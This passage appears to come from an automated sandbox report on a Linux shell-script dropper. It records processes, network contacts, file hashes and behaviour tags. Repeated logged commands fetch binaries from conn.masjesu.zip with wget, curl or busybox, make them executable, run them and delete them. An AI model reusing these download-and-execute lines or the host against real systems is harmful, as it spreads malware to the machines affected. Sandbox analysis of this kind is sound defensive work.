[/bin/busybox wget http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/chmod

[chmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr

[./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/rm

[rm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/chmod

[chmod 777 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs

[./lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/rm

[rm lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/chmod

[chmod 777 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2

[./VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/rm

[rm VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/chmod

[chmod 777 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0

[./dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/rm

[rm dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/chmod

[chmod 777 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ

[./cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/rm

[rm cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/chmod

[chmod 777 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K

[./mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/rm

[rm mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/chmod

[chmod 777 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE

[./cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/rm

[rm cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/chmod

[chmod 777 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce

[./LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/rm

[rm LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/chmod

[chmod 777 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl

[./ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/rm

[rm ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/chmod

[chmod 777 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8

[./4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/rm

[rm 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp

Files

/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa

MD5 e1732e70f015e99d14dff1eeeaec9966
SHA1 c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA256 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA512 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-21 01:37

Reported

2024-10-21 01:40

Platform

debian9-mipsel-20240226-en

Max time kernel

147s

Max time network

153s

Command Line

[/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE N/A
N/A /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ N/A
N/A /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K N/A
N/A /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 N/A
N/A /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce N/A
N/A /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl N/A
N/A /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ N/A
N/A /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 N/A
N/A /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa N/A
N/A /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI N/A
N/A /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 N/A
N/A /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr N/A
N/A /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs N/A
N/A /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 N/A
N/A /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 N/A
N/A /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa N/A
N/A /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI N/A
N/A /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /usr/bin/curl N/A
File opened for modification /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /usr/bin/curl N/A
File opened for modification /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /usr/bin/curl N/A
File opened for modification /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /usr/bin/curl N/A
File opened for modification /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /usr/bin/curl N/A
File opened for modification /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /usr/bin/curl N/A
File opened for modification /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 /usr/bin/curl N/A
File opened for modification /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /usr/bin/curl N/A
File opened for modification /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /usr/bin/curl N/A
File opened for modification /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /usr/bin/curl N/A
File opened for modification /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /usr/bin/curl N/A
File opened for modification /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /usr/bin/curl N/A
File opened for modification /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /usr/bin/curl N/A
File opened for modification /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /usr/bin/curl N/A
File opened for modification /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /usr/bin/curl N/A
File opened for modification /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /usr/bin/curl N/A
File opened for modification /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /usr/bin/curl N/A
File opened for modification /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /usr/bin/curl N/A

Processes

/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh

[/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/chmod

[chmod 777 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE

[./cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/rm

[rm cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/chmod

[chmod 777 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ

[./cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/rm

[rm cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/chmod

[chmod 777 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K

[./mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/rm

[rm mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/chmod

[chmod 777 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8

[./4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/rm

[rm 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/chmod

[chmod 777 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce

[./LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/rm

[rm LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/usr/bin/wget

